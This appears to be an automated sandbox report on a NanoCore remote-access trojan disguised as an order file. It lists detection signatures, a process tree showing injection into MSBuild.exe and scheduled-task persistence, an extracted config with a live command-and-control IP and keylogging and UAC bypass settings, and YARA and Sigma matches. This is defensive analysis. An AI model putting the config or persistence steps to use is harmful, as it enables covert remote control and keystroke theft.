Play interactive tour

Edit tour

Windows Analysis Report P0 (2021)-2790 new order.exe

Overview

General Information

Sample Name:	P0 (2021)-2790 new order.exe
Analysis ID:	483496
MD5:	394ff651c9fa2bfca16c32fb117514e1
SHA1:	e9ae9e9c2985aaa1c96c7186f9147eebddb7b203
SHA256:	25cc795662dc5f48d3e7dc1fcab5add2deed04887f7cfef18d1d4a3d7abf5ee7
Tags:	exeNanoCoreRAT
Infos:
Most interesting Screenshot:

Detection

Nanocore

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Found malware configuration

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)

Malicious sample detected (through community Yara rule)

Sigma detected: NanoCore

Detected Nanocore Rat

Multi AV Scanner detection for domain / URL

Yara detected Nanocore RAT

Maps a DLL or memory area into another process

Initial sample is a PE file and has a suspicious name

.NET source code contains potential unpacker

C2 URLs / IPs found in malware configuration

Hides that the sample has been downloaded from the Internet (zone.identifier)

Uses schtasks.exe or at.exe to add and modify task schedules

Uses 32bit PE files

Queries the volume information (name, serial number etc) of a device

Yara signature match

Antivirus or Machine Learning detection for unpacked file

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to query locales information (e.g. system language)

May sleep (evasive loops) to hinder dynamic analysis

Uses code obfuscation techniques (call, push, ret)

Internet Provider seen in connection with other malware

Detected potential crypto function

Contains functionality to query CPU information (cpuid)

Sample execution stops while process was sleeping (likely an evasion)

Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)

Contains functionality to call native functions

Contains functionality which may be used to detect a debugger (GetProcessHeap)

IP address seen in connection with other malware

Contains long sleeps (>= 3 min)

Enables debug privileges

Creates a DirectInput object (often for capturing keystrokes)

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Installs a raw input device (often for capturing keystrokes)

Sample file is different than original file name gathered from version info

Extensive use of GetProcAddress (often used to hide API calls)

PE file contains strange resources

Drops PE files

Contains functionality to open a port and listen for incoming connection (possibly a backdoor)

Detected TCP or UDP traffic on non-standard ports

Creates a process in suspended mode (likely to inject code)

Classification

Process Tree

System is w10x64

P0 (2021)-2790 new order.exe (PID: 6380 cmdline: 'C:\Users\user\Desktop\P0 (2021)-2790 new order.exe' MD5: 394FF651C9FA2BFCA16C32FB117514E1)

conhost.exe (PID: 6388 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

MSBuild.exe (PID: 6440 cmdline: 'C:\Users\user\Desktop\P0 (2021)-2790 new order.exe' MD5: 88BBB7610152B48C2B3879473B17857E)

schtasks.exe (PID: 6652 cmdline: 'schtasks.exe' /create /f /tn 'DHCP Monitor' /xml 'C:\Users\user\AppData\Local\Temp\tmp7C69.tmp' MD5: 15FF7D8324231381BAD48A052F85DF04)

conhost.exe (PID: 6676 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

schtasks.exe (PID: 6724 cmdline: 'schtasks.exe' /create /f /tn 'DHCP Monitor Task' /xml 'C:\Users\user\AppData\Local\Temp\tmp8052.tmp' MD5: 15FF7D8324231381BAD48A052F85DF04)

conhost.exe (PID: 6732 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

MSBuild.exe (PID: 6824 cmdline: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe 0 MD5: 88BBB7610152B48C2B3879473B17857E)

conhost.exe (PID: 6832 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

dhcpmon.exe (PID: 6840 cmdline: 'C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe' 0 MD5: 88BBB7610152B48C2B3879473B17857E)

conhost.exe (PID: 6848 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

dhcpmon.exe (PID: 7028 cmdline: 'C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe' MD5: 88BBB7610152B48C2B3879473B17857E)

conhost.exe (PID: 7036 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

cleanup

Malware Configuration

Threatname: NanoCore

{"Version": "1.2.2.0", "Mutex": "6e073bd7-7c11-48c2-8a90-355dddea", "Group": "Default", "Domain1": "185.140.53.8", "Domain2": "", "Port": 8907, "KeyboardLogging": "Enable", "RunOnStartup": "Enable", "RequestElevation": "Enable", "BypassUAC": "Enable", "ClearZoneIdentifier": "Enable", "ClearAccessControl": "Disable", "SetCriticalProcess": "Disable", "PreventSystemSleep": "Enable", "ActivateAwayMode": "Disable", "EnableDebugMode": "Disable", "RunDelay": 0, "ConnectDelay": 4000, "RestartDelay": 5000, "TimeoutInterval": 5000, "KeepAliveTimeout": 30000, "MutexTimeout": 5000, "LanTimeout": 2500, "WanTimeout": 8000, "BufferSize": "ffff0000", "MaxPacketSize": "0000a000", "GCThreshold": "0000a000", "UseCustomDNS": "Enable", "PrimaryDNSServer": "", "BackupDNSServer": "185.140.53.8", "BypassUserAccountControlData": "<?xml version=\"1.0\" encoding=\"UTF-16\"?>\r\n<Task version=\"1.2\" xmlns=\"http://schemas.microsoft.com/windows/2004/02/mit/task\">\r\n  <RegistrationInfo />\r\n  <Triggers />\r\n  <Principals>\r\n    <Principal id=\"Author\">\r\n      <LogonType>InteractiveToken</LogonType>\r\n      <RunLevel>HighestAvailable</RunLevel>\r\n    </Principal>\r\n  </Principals>\r\n  <Settings>\r\n    <MultipleInstancesPolicy>Parallel</MultipleInstancesPolicy>\r\n    <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>\r\n    <StopIfGoingOnBatteries>false</StopIfGoingOnBatteries>\r\n    <AllowHardTerminate>true</AllowHardTerminate>\r\n    <StartWhenAvailable>false</StartWhenAvailable>\r\n    <RunOnlyIfNetworkAvailable>false</RunOnlyIfNetworkAvailable>\r\n    <IdleSettings>\r\n      <StopOnIdleEnd>false</StopOnIdleEnd>\r\n      <RestartOnIdle>false</RestartOnIdle>\r\n    </IdleSettings>\r\n    <AllowStartOnDemand>true</AllowStartOnDemand>\r\n    <Enabled>true</Enabled>\r\n    <Hidden>false</Hidden>\r\n    <RunOnlyIfIdle>false</RunOnlyIfIdle>\r\n    <WakeToRun>false</WakeToRun>\r\n    <ExecutionTimeLimit>PT0S</ExecutionTimeLimit>\r\n    <Priority>4</Priority>\r\n  </Settings>\r\n  <Actions Context=\"Author\">\r\n    <Exec>\r\n      <Command>\"#EXECUTABLEPATH\"</Command>\r\n      <Arguments>$(Arg0)</Arguments>\r\n    </Exec>\r\n  </Actions>\r\n</Task"}

Yara Overview

Memory Dumps

Source	Rule	Description	Author	Strings
00000002.00000002.479823366.0000000000402000.00000040.00020000.sdmp	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0xff8d:$x1: NanoCore.ClientPluginHost 0xffca:$x2: IClientNetworkHost 0x13afd:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
00000002.00000002.479823366.0000000000402000.00000040.00020000.sdmp	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
00000002.00000002.479823366.0000000000402000.00000040.00020000.sdmp	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0xfcf5:$a: NanoCore 0xfd05:$a: NanoCore 0xff39:$a: NanoCore 0xff4d:$a: NanoCore 0xff8d:$a: NanoCore 0xfd54:$b: ClientPlugin 0xff56:$b: ClientPlugin 0xff96:$b: ClientPlugin 0xfe7b:$c: ProjectData 0x10882:$d: DESCrypto 0x1824e:$e: KeepAlive 0x1623c:$g: LogClientMessage 0x12437:$i: get_Connected 0x10bb8:$j: #=q 0x10be8:$j: #=q 0x10c04:$j: #=q 0x10c34:$j: #=q 0x10c50:$j: #=q 0x10c6c:$j: #=q 0x10c9c:$j: #=q 0x10cb8:$j: #=q
00000002.00000002.484597915.00000000040C9000.00000004.00000001.sdmp	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
00000002.00000002.485007729.0000000005A20000.00000004.00020000.sdmp	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0xe75:$x1: NanoCore.ClientPluginHost 0xe8f:$x2: IClientNetworkHost
00000002.00000002.485007729.0000000005A20000.00000004.00020000.sdmp	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0xe75:$x2: NanoCore.ClientPluginHost 0x1261:$s3: PipeExists 0x1136:$s4: PipeCreated 0xeb0:$s5: IClientLoggingHost
00000000.00000002.223144000.0000000002720000.00000004.00000001.sdmp	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x1018d:$x1: NanoCore.ClientPluginHost 0x101ca:$x2: IClientNetworkHost 0x13cfd:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
00000000.00000002.223144000.0000000002720000.00000004.00000001.sdmp	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0xff05:$x1: NanoCore Client.exe 0x1018d:$x2: NanoCore.ClientPluginHost 0x117c6:$s1: PluginCommand 0x117ba:$s2: FileCommand 0x1266b:$s3: PipeExists 0x18422:$s4: PipeCreated 0x101b7:$s5: IClientLoggingHost
00000000.00000002.223144000.0000000002720000.00000004.00000001.sdmp	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
00000000.00000002.223144000.0000000002720000.00000004.00000001.sdmp	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0xfef5:$a: NanoCore 0xff05:$a: NanoCore 0x10139:$a: NanoCore 0x1014d:$a: NanoCore 0x1018d:$a: NanoCore 0xff54:$b: ClientPlugin 0x10156:$b: ClientPlugin 0x10196:$b: ClientPlugin 0x1007b:$c: ProjectData 0x10a82:$d: DESCrypto 0x1844e:$e: KeepAlive 0x1643c:$g: LogClientMessage 0x12637:$i: get_Connected 0x10db8:$j: #=q 0x10de8:$j: #=q 0x10e04:$j: #=q 0x10e34:$j: #=q 0x10e50:$j: #=q 0x10e6c:$j: #=q 0x10e9c:$j: #=q 0x10eb8:$j: #=q
00000002.00000002.485086472.0000000005CC0000.00000004.00020000.sdmp	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0xf7ad:$x1: NanoCore.ClientPluginHost 0xf7da:$x2: IClientNetworkHost
00000002.00000002.485086472.0000000005CC0000.00000004.00020000.sdmp	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0xf7ad:$x2: NanoCore.ClientPluginHost 0x10888:$s4: PipeCreated 0xf7c7:$s5: IClientLoggingHost
00000002.00000002.485086472.0000000005CC0000.00000004.00020000.sdmp	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
Process Memory Space: P0 (2021)-2790 new order.exe PID: 6380	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x7d86a:$x1: NanoCore.ClientPluginHost 0x7d8a7:$x2: IClientNetworkHost 0x81398:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe 0x8c3d6:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
Process Memory Space: P0 (2021)-2790 new order.exe PID: 6380	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
Process Memory Space: P0 (2021)-2790 new order.exe PID: 6380	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0x7d544:$a: NanoCore 0x7d554:$a: NanoCore 0x7d606:$a: NanoCore 0x7d615:$a: NanoCore 0x7d816:$a: NanoCore 0x7d82a:$a: NanoCore 0x7d86a:$a: NanoCore 0x88a40:$a: NanoCore 0x88a52:$a: NanoCore 0x88a8e:$a: NanoCore 0x7d5a3:$b: ClientPlugin 0x7d65f:$b: ClientPlugin 0x7d833:$b: ClientPlugin 0x7d873:$b: ClientPlugin 0x88a5b:$b: ClientPlugin 0x88a97:$b: ClientPlugin 0x7d758:$c: ProjectData 0x8898d:$c: ProjectData 0x7e12c:$d: DESCrypto 0x892eb:$d: DESCrypto 0x85ae9:$e: KeepAlive
Process Memory Space: MSBuild.exe PID: 6440	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x15ab4:$x1: NanoCore.ClientPluginHost 0x15af1:$x2: IClientNetworkHost 0x195cd:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe 0x24653:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
Process Memory Space: MSBuild.exe PID: 6440	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
Process Memory Space: MSBuild.exe PID: 6440	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0x1578a:$a: NanoCore 0x1579a:$a: NanoCore 0x15859:$a: NanoCore 0x15868:$a: NanoCore 0x15a60:$a: NanoCore 0x15a74:$a: NanoCore 0x15ab4:$a: NanoCore 0x20cbd:$a: NanoCore 0x20ccf:$a: NanoCore 0x20d0b:$a: NanoCore 0x30377:$a: NanoCore 0x305f7:$a: NanoCore 0x3064a:$a: NanoCore 0x30683:$a: NanoCore 0x306f6:$a: NanoCore 0x45075:$a: NanoCore 0x45088:$a: NanoCore 0x450ba:$a: NanoCore 0x4bc58:$a: NanoCore 0x4bc6b:$a: NanoCore 0x4bc9d:$a: NanoCore
Click to see the 14 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
2.2.MSBuild.exe.5cc0000.6.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0xd9ad:$x1: NanoCore.ClientPluginHost 0xd9da:$x2: IClientNetworkHost
2.2.MSBuild.exe.5cc0000.6.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0xd9ad:$x2: NanoCore.ClientPluginHost 0xea88:$s4: PipeCreated 0xd9c7:$s5: IClientLoggingHost
2.2.MSBuild.exe.5cc0000.6.unpack	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
2.2.MSBuild.exe.40d7a70.2.raw.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0xf7ad:$x1: NanoCore.ClientPluginHost 0xf7da:$x2: IClientNetworkHost
2.2.MSBuild.exe.40d7a70.2.raw.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0xf7ad:$x2: NanoCore.ClientPluginHost 0x10888:$s4: PipeCreated 0xf7c7:$s5: IClientLoggingHost
2.2.MSBuild.exe.40d7a70.2.raw.unpack	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
2.2.MSBuild.exe.40d7a70.2.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0xd9ad:$x1: NanoCore.ClientPluginHost 0xd9da:$x2: IClientNetworkHost
2.2.MSBuild.exe.40d7a70.2.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0xd9ad:$x2: NanoCore.ClientPluginHost 0xea88:$s4: PipeCreated 0xd9c7:$s5: IClientLoggingHost
2.2.MSBuild.exe.40d7a70.2.unpack	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
2.2.MSBuild.exe.5cc0000.6.raw.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0xf7ad:$x1: NanoCore.ClientPluginHost 0xf7da:$x2: IClientNetworkHost
2.2.MSBuild.exe.5cc0000.6.raw.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0xf7ad:$x2: NanoCore.ClientPluginHost 0x10888:$s4: PipeCreated 0xf7c7:$s5: IClientLoggingHost
2.2.MSBuild.exe.5cc0000.6.raw.unpack	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
2.2.MSBuild.exe.30812fc.1.raw.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0xe75:$x1: NanoCore.ClientPluginHost 0xe8f:$x2: IClientNetworkHost
2.2.MSBuild.exe.30812fc.1.raw.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0xe75:$x2: NanoCore.ClientPluginHost 0x1261:$s3: PipeExists 0x1136:$s4: PipeCreated 0xeb0:$s5: IClientLoggingHost
0.2.P0 (2021)-2790 new order.exe.2720000.1.raw.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x1018d:$x1: NanoCore.ClientPluginHost 0x101ca:$x2: IClientNetworkHost 0x13cfd:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
0.2.P0 (2021)-2790 new order.exe.2720000.1.raw.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0xff05:$x1: NanoCore Client.exe 0x1018d:$x2: NanoCore.ClientPluginHost 0x117c6:$s1: PluginCommand 0x117ba:$s2: FileCommand 0x1266b:$s3: PipeExists 0x18422:$s4: PipeCreated 0x101b7:$s5: IClientLoggingHost
0.2.P0 (2021)-2790 new order.exe.2720000.1.raw.unpack	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
0.2.P0 (2021)-2790 new order.exe.2720000.1.raw.unpack	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0xfef5:$a: NanoCore 0xff05:$a: NanoCore 0x10139:$a: NanoCore 0x1014d:$a: NanoCore 0x1018d:$a: NanoCore 0xff54:$b: ClientPlugin 0x10156:$b: ClientPlugin 0x10196:$b: ClientPlugin 0x1007b:$c: ProjectData 0x10a82:$d: DESCrypto 0x1844e:$e: KeepAlive 0x1643c:$g: LogClientMessage 0x12637:$i: get_Connected 0x10db8:$j: #=q 0x10de8:$j: #=q 0x10e04:$j: #=q 0x10e34:$j: #=q 0x10e50:$j: #=q 0x10e6c:$j: #=q 0x10e9c:$j: #=q 0x10eb8:$j: #=q
0.2.P0 (2021)-2790 new order.exe.2720000.1.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0xe38d:$x1: NanoCore.ClientPluginHost 0xe3ca:$x2: IClientNetworkHost 0x11efd:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
0.2.P0 (2021)-2790 new order.exe.2720000.1.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0xe105:$x1: NanoCore Client.exe 0xe38d:$x2: NanoCore.ClientPluginHost 0xf9c6:$s1: PluginCommand 0xf9ba:$s2: FileCommand 0x1086b:$s3: PipeExists 0x16622:$s4: PipeCreated 0xe3b7:$s5: IClientLoggingHost
0.2.P0 (2021)-2790 new order.exe.2720000.1.unpack	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
0.2.P0 (2021)-2790 new order.exe.2720000.1.unpack	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0xe0f5:$a: NanoCore 0xe105:$a: NanoCore 0xe339:$a: NanoCore 0xe34d:$a: NanoCore 0xe38d:$a: NanoCore 0xe154:$b: ClientPlugin 0xe356:$b: ClientPlugin 0xe396:$b: ClientPlugin 0xe27b:$c: ProjectData 0xec82:$d: DESCrypto 0x1664e:$e: KeepAlive 0x1463c:$g: LogClientMessage 0x10837:$i: get_Connected 0xefb8:$j: #=q 0xefe8:$j: #=q 0xf004:$j: #=q 0xf034:$j: #=q 0xf050:$j: #=q 0xf06c:$j: #=q 0xf09c:$j: #=q 0xf0b8:$j: #=q
2.2.MSBuild.exe.400000.0.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x1018d:$x1: NanoCore.ClientPluginHost 0x101ca:$x2: IClientNetworkHost 0x13cfd:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
2.2.MSBuild.exe.400000.0.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0xff05:$x1: NanoCore Client.exe 0x1018d:$x2: NanoCore.ClientPluginHost 0x117c6:$s1: PluginCommand 0x117ba:$s2: FileCommand 0x1266b:$s3: PipeExists 0x18422:$s4: PipeCreated 0x101b7:$s5: IClientLoggingHost
2.2.MSBuild.exe.400000.0.unpack	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
2.2.MSBuild.exe.400000.0.unpack	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0xfef5:$a: NanoCore 0xff05:$a: NanoCore 0x10139:$a: NanoCore 0x1014d:$a: NanoCore 0x1018d:$a: NanoCore 0xff54:$b: ClientPlugin 0x10156:$b: ClientPlugin 0x10196:$b: ClientPlugin 0x1007b:$c: ProjectData 0x10a82:$d: DESCrypto 0x1844e:$e: KeepAlive 0x1643c:$g: LogClientMessage 0x12637:$i: get_Connected 0x10db8:$j: #=q 0x10de8:$j: #=q 0x10e04:$j: #=q 0x10e34:$j: #=q 0x10e50:$j: #=q 0x10e6c:$j: #=q 0x10e9c:$j: #=q 0x10eb8:$j: #=q
2.2.MSBuild.exe.5a20000.4.raw.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0xe75:$x1: NanoCore.ClientPluginHost 0xe8f:$x2: IClientNetworkHost
2.2.MSBuild.exe.5a20000.4.raw.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0xe75:$x2: NanoCore.ClientPluginHost 0x1261:$s3: PipeExists 0x1136:$s4: PipeCreated 0xeb0:$s5: IClientLoggingHost
2.2.MSBuild.exe.40dc099.3.raw.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0xb184:$x1: NanoCore.ClientPluginHost 0xb1b1:$x2: IClientNetworkHost
2.2.MSBuild.exe.40dc099.3.raw.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0xb184:$x2: NanoCore.ClientPluginHost 0xc25f:$s4: PipeCreated 0xb19e:$s5: IClientLoggingHost
2.2.MSBuild.exe.40dc099.3.raw.unpack	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
2.2.MSBuild.exe.5cc4629.5.raw.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0xb184:$x1: NanoCore.ClientPluginHost 0xb1b1:$x2: IClientNetworkHost
2.2.MSBuild.exe.5cc4629.5.raw.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0xb184:$x2: NanoCore.ClientPluginHost 0xc25f:$s4: PipeCreated 0xb19e:$s5: IClientLoggingHost
2.2.MSBuild.exe.5cc4629.5.raw.unpack	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
Click to see the 29 entries

Sigma Overview

AV Detection:

Sigma detected: NanoCore

Show sources

Source: File created

Author: Joe Security: Data: EventID: 11, Image: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe, ProcessId: 6440, TargetFilename: C:\Users\user\AppData\Roaming\D06ED635-68F6-4E9A-955C-4899F5F57B9A\run.dat

E-Banking Fraud:

Sigma detected: NanoCore

Show sources

Source: File created

Stealing of Sensitive Information:

Sigma detected: NanoCore

Show sources

Source: File created

Remote Access Functionality:

Sigma detected: NanoCore

Show sources

Source: File created

Jbx Signature Overview

Click to jump to signature section

Show All Signature Results

AV Detection:

Found malware configuration

Show sources

Source: 00000002.00000002.484597915.00000000040C9000.00000004.00000001.sdmp

Malware Configuration Extractor: NanoCore {"Version": "1.2.2.0", "Mutex": "6e073bd7-7c11-48c2-8a90-355dddea", "Group": "Default", "Domain1": "185.140.53.8", "Domain2": "", "Port": 8907, "KeyboardLogging": "Enable", "RunOnStartup": "Enable", "RequestElevation": "Enable", "BypassUAC": "Enable", "ClearZoneIdentifier": "Enable", "ClearAccessControl": "Disable", "SetCriticalProcess": "Disable", "PreventSystemSleep": "Enable", "ActivateAwayMode": "Disable", "EnableDebugMode": "Disable", "RunDelay": 0, "ConnectDelay": 4000, "RestartDelay": 5000, "TimeoutInterval": 5000, "KeepAliveTimeout": 30000, "MutexTimeout": 5000, "LanTimeout": 2500, "WanTimeout": 8000, "BufferSize": "ffff0000", "MaxPacketSize": "0000a000", "GCThreshold": "0000a000", "UseCustomDNS": "Enable", "PrimaryDNSServer": "", "BackupDNSServer": "185.140.53.8", "BypassUserAccountControlData": "<?xml version=\"1.0\" encoding=\"UTF-16\"?>\r\n<Task version=\"1.2\" xmlns=\"http://schemas.microsoft.com/windows/2004/02/mit/task\">\r\n <RegistrationInfo />\r\n <Triggers />\r\n <Principals>\r\n <Principal id=\"Author\">\r\n <LogonType>InteractiveToken</LogonType>\r\n <RunLevel>HighestAvailable</RunLevel>\r\n </Principal>\r\n </Principals>\r\n <Settings>\r\n <MultipleInstancesPolicy>Parallel</MultipleInstancesPolicy>\r\n <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>\r\n <StopIfGoingOnBatteries>false</StopIfGoingOnBatteries>\r\n <AllowHardTerminate>true</AllowHardTerminate>\r\n <StartWhenAvailable>false</StartWhenAvailable>\r\n <RunOnlyIfNetworkAvailable>false</RunOnlyIfNetworkAvailable>\r\n <IdleSettings>\r\n <StopOnIdleEnd>false</StopOnIdleEnd>\r\n <RestartOnIdle>false</RestartOnIdle>\r\n </IdleSettings>\r\n <AllowStartOnDemand>true</AllowStartOnDemand>\r\n <Enabled>true</Enabled>\r\n <Hidden>false</Hidden>\r\n <RunOnlyIfIdle>false</RunOnlyIfIdle>\r\n <WakeToRun>false</WakeToRun>\r\n <ExecutionTimeLimit>PT0S</ExecutionTimeLimit>\r\n <Priority>4</Priority>\r\n </Settings>\r\n <Actions Context=\"Author\">\r\n <Exec>\r\n <Command>\"#EXECUTABLEPATH\"</Command>\r\n <Arguments>$(Arg0)</Arguments>\r\n </Exec>\r\n </Actions>\r\n</Task"}

Multi AV Scanner detection for domain / URL

Show sources

Source: 185.140.53.8

Virustotal: Detection: 11%

Perma Link

Yara detected Nanocore RAT

Show sources

Source: Yara match	File source: 2.2.MSBuild.exe.5cc0000.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.MSBuild.exe.40d7a70.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.MSBuild.exe.40d7a70.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.MSBuild.exe.5cc0000.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.P0 (2021)-2790 new order.exe.2720000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.P0 (2021)-2790 new order.exe.2720000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.MSBuild.exe.40dc099.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.MSBuild.exe.5cc4629.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000002.00000002.479823366.0000000000402000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.484597915.00000000040C9000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.223144000.0000000002720000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.485086472.0000000005CC0000.00000004.00020000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: P0 (2021)-2790 new order.exe PID: 6380, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: MSBuild.exe PID: 6440, type: MEMORYSTR

Source: 2.2.MSBuild.exe.5cc0000.6.unpack	Avira: Label: TR/NanoCore.fadte
Source: 2.2.MSBuild.exe.400000.0.unpack	Avira: Label: TR/Dropper.MSIL.Gen7

Source: P0 (2021)-2790 new order.exe

Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE

Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe

File opened: C:\Windows\WinSxS\x86_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.9445_none_d08c58b4442ba54f\MSVCR80.dll

Jump to behavior

Source: P0 (2021)-2790 new order.exe

Static PE information: TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT

Source:	Binary string: C:\Windows\assembly\GAC_MSIL\System\2.0.0.0__b77a5c561934e089\System.pdbind source: MSBuild.exe, 00000002.00000002.482252225.0000000002CB5000.00000004.00000040.sdmp
Source:	Binary string: indows\MSBuild.pdbpdbild.p source: MSBuild.exe, 00000002.00000002.482252225.0000000002CB5000.00000004.00000040.sdmp
Source:	Binary string: wntdll.pdbUGP source: P0 (2021)-2790 new order.exe, 00000000.00000003.219629284.0000000002860000.00000004.00000001.sdmp
Source:	Binary string: wntdll.pdb source: P0 (2021)-2790 new order.exe, 00000000.00000003.219629284.0000000002860000.00000004.00000001.sdmp
Source:	Binary string: C:\Windows\System.pdb\W44FX source: MSBuild.exe, 00000002.00000002.482252225.0000000002CB5000.00000004.00000040.sdmp
